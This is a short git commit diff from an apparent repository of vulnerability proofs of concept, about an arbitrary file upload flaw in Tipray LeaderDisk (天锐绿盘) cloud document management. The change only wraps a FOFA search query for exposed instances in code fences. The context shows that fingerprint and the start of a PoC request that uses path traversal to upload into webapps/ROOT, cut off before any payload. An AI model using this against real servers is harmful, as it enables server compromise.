Update 天锐绿盘云文档安全管理uploadFolder存在文件上传.md

2025-11-04 18:06:34 +00:00 · 2025-09-01 16:04:39 +08:00 · 2025-09-01 16:04:39 +08:00 · 113ae22df5
commit 113ae22df5
parent e3404db1bc
1 changed files with 2 additions and 2 deletions
--- a/wpoc/天锐绿盘云文档安全管理/天锐绿盘云文档安全管理uploadFolder存在文件上传.md
+++ b/wpoc/天锐绿盘云文档安全管理/天锐绿盘云文档安全管理uploadFolder存在文件上传.md
@ -3,9 +3,9 @@
 天锐绿盘云文档安全管理存在任意文件上传漏洞，可以获取服务器权限

 ## fofa
-
+```
 body="/lddsm/" || title="天锐绿盘" || title=="Tipray LeaderDisk"||body="location.href=location.href+\"lddsm\""
-
+```
 ## poc
 ```javascript
 POST /lddsm/service/../admin/activiti/uploadFolder.do?taskId=../webapps/ROOT/&relativepath=1&path=1 HTTP/1.1